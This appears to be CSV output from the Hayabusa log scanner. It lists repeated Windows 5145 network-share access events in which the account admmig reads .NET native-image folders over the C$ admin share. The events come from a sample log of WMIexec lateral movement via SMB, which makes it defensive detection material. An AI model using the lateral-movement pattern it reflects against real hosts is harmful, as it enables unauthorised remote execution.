2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
